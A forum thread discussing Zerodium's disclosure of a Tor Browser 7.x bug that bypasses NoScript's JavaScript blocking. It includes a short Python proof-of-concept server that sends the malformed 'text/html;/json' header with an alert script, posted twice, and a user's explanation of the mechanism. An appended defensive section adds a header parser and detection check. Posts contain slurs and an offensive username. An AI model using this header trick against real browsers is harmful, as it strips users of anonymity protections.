
Old Tor Browser Zero Day Released

  1. #1
    Advisory: Tor Browser 7.x has a serious vuln/bugdoor leading to full bypass of Tor / NoScript 'Safest' security level (supposed to block all JS).
    PoC: Set the Content-Type of your html/js page to "text/html;/json" and enjoy full JS pwnage. Newly released Tor 8.x is Not affected.
    https://twitter.com/Zerodium/status/1039127214602641409?s=19

    Apparently being released as it doesn't affect Tor Browser 8, and Zerodium can't sell it to their customers (mostly governments) any more.
  2. #2
    Sophie Pedophile Tech Support
    Joke's on you 0day, i always run the latest Tor.
  3. #3
    Originally posted by Sophie Joke's on you 0day, i always run the latest Tor.

    I should have said "made public". Zerodium have been selling this exploit to anyone who will pay for 6 months or so.
  4. #4
    Sophie Pedophile Tech Support
    Originally posted by MORALLY SUPERIOR BEING 2.0 - The GMO Reckoning I should have said "made public". Zerodium have been selling this exploit to anyone who will pay for 6 months or so.

    Eh, haven't been anywhere risqué lately. So YOLO.
  5. #5
    Sudo Black Hole [my hereto riemannian peach]
    Who wouldn't want to buy a tor 0day? That would be kind of amazing and profitable.
  6. #6
    Sophie Pedophile Tech Support
    Originally posted by Sudo Who wouldn't want to buy a tor 0day? That would be kind of amazing and profitable.

    That's why Zerodium's entire business model is acquiring 0days, and selling them on.
  7. #7
    Sudo Black Hole [my hereto riemannian peach]
    Originally posted by Sophie That's why Zerodium's entire business model is acquiring 0days, and selling them on.

    Yeah I'd never heard of them before but that sounds highly profitable. I bet they have a team of methed out slavs listening to techno 24/7
  8. #8
    aldra JIDF Controlled Opposition
    Originally posted by Sophie Joke's on you 0day, i always run the latest Tor.

    just install tor properly and don't use the faggot bundles

    all the major 'tor' flaws released have actually been issues with the included browser
  9. #9
    -SpectraL coward [the spuriously bluish-lilac bushman]
    #!/usr/bin/python
    from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer

    PORT_NUMBER = 31337

    class myHandler(BaseHTTPRequestHandler):

        #Handler for the GET requests
        def do_GET(self):
            self.send_response(200)
            self.send_header('Content-type','text/html;/json') # Here is where the magic happens
            self.end_headers()
            self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
            return

    try:
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print 'Started httpserver on port ' , PORT_NUMBER
        server.serve_forever()

    except KeyboardInterrupt:
        print '^C received, shutting down the web server'
        server.socket.close()
  10. #10
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL
    #!/usr/bin/python
    from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer

    PORT_NUMBER = 31337

    class myHandler(BaseHTTPRequestHandler):

        #Handler for the GET requests
        def do_GET(self):
            self.send_response(200)
            self.send_header('Content-type','text/html;/json') # Here is where the magic happens
            self.end_headers()
            self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
            return

    try:
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print 'Started httpserver on port ' , PORT_NUMBER
        server.serve_forever()

    except KeyboardInterrupt:
        print '^C received, shutting down the web server'
        server.socket.close()

    Gonna go out on a limb here and say you stole that PoC from X0rz, without checking. What do i get if i am right?
  11. #11
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Originally posted by Sophie Gonna go out on a limb here and say you stole that PoC from X0rz, without checking. What do i get if i am right?

    You get a caramel-coated, peppermint fudge twizzle stick.
  12. #12
    Sophie Pedophile Tech Support
    https://gist.github.com/x0rz/8198e8e22b1f70fddb9c815c1232b795

    Where's my twizzle stick.
  13. #13
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Originally posted by Sophie https://gist.github.com/x0rz/8198e8e22b1f70fddb9c815c1232b795

    Where's my twizzle stick.

    No, that's not where I got it.
  14. #14
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL No, that's not where I got it.


    The code is literally the same, if you got it from some place else that person stole it from x0rz first, i know this. x0rz was posting about this very issue earlier today you mong.
  15. #15
    Lanny Bird of Courage
    Only have to ask spectral one question in vulnerability disclosure threads: explain the attack in your own words.

    - From there you just have to sit back and enjoy the ducking and diving he'll go through in order to pretend like he understands.
  16. #16
    HTS highlight reel
    Originally posted by Lanny
    Only have to ask spectral one question in vulnerability disclosure threads: explain the attack in your own words.

    - From there you just have to sit back and enjoy the ducking and diving he'll go through in order to pretend like he understands.

    The base HTTP request handler is requesting js from pages, bypassing NoScript.

    (I have no idea what I'm talking about.)
  17. #17
    HTS highlight reel
    Can I get a gold star for trying?
  18. #18
    Sophie Pedophile Tech Support
    Read the comments in the code you'll figure it out.
  19. #19
    Lanny Bird of Courage
  20. #20
    aldra JIDF Controlled Opposition
    Originally posted by HTS The base HTTP request handler is requesting js from pages, bypassing NoScript.

    (I have no idea what I'm talking about.)

    normally when a page sends the header, it tells your browser what sort of content is to be loaded. the tor-configured browser by default will block javascript even if it's requested, but for whatever reason if you request JSON (which relies on javascript) with that semicolon in there (probably causes the enhancement to think the header is finished so it doesn't search any further) it spazzes out and loads it anyway
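Added example, not from this thread and not NoScript's or Tor Browser's code: a strict Content-Type parser next to a hypothetical lenient one, showing why the advisory's "text/html;/json" is not a valid media type at all, plus a check that flags such values when reviewing proxy or server response logs. The sample header values are constructed; the lenient parser is an assumed stand-in for "stop at the first semicolon" filtering, not a claim about how NoScript 7.x actually parsed the header.

```python
import re

# Simplified RFC 7231 grammar: type "/" subtype *( ";" name "=" ( token / quoted-string ) )
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_MEDIA_RE = re.compile(rf"^(?P<type>{_TOKEN})/(?P<subtype>{_TOKEN})$")
_PARAM_RE = re.compile(rf"^(?P<name>{_TOKEN})=(?P<value>{_TOKEN}|\"(?:[^\"\\]|\\.)*\")$")


def parse_content_type_strict(value):
    """Return (type/subtype, {param: value}) or None if any segment is malformed."""
    segments = [s.strip() for s in value.split(";")]
    media = _MEDIA_RE.match(segments[0])
    if not media:
        return None
    params = {}
    for seg in segments[1:]:
        param = _PARAM_RE.match(seg)
        if not param:  # e.g. "/json": no name=value pair, so the whole header is invalid
            return None
        val = param.group("value")
        if val.startswith('"'):
            val = re.sub(r"\\(.)", r"\1", val[1:-1])  # unquote, drop backslash escapes
        params[param.group("name").lower()] = val
    return (f"{media.group('type')}/{media.group('subtype')}".lower(), params)


def parse_content_type_lenient(value):
    """Hypothetical lenient filter: keep what precedes the first ';' and ignore the rest."""
    return value.split(";", 1)[0].strip().lower()


def flag_suspicious_content_types(header_values):
    """Values a lenient parser accepts as a normal media type but strict parsing rejects.
    A proxy or log review can treat these as possible filter-evasion attempts."""
    return [v for v in header_values
            if parse_content_type_strict(v) is None and "/" in parse_content_type_lenient(v)]


# Constructed sample Content-Type values (not captured traffic)
SAMPLE_HEADERS = [
    "text/html",
    "text/html; charset=utf-8",
    'text/html; charset="utf-8"',
    "text/html;/json",  # the malformed value from the advisory
    "application/json; /json",
    "text/javascript; charset",
]

if __name__ == "__main__":
    for v in SAMPLE_HEADERS:
        print(f"{v!r:32} strict={parse_content_type_strict(v)} lenient={parse_content_type_lenient(v)!r}")
    print("flagged:", flag_suspicious_content_types(SAMPLE_HEADERS))
```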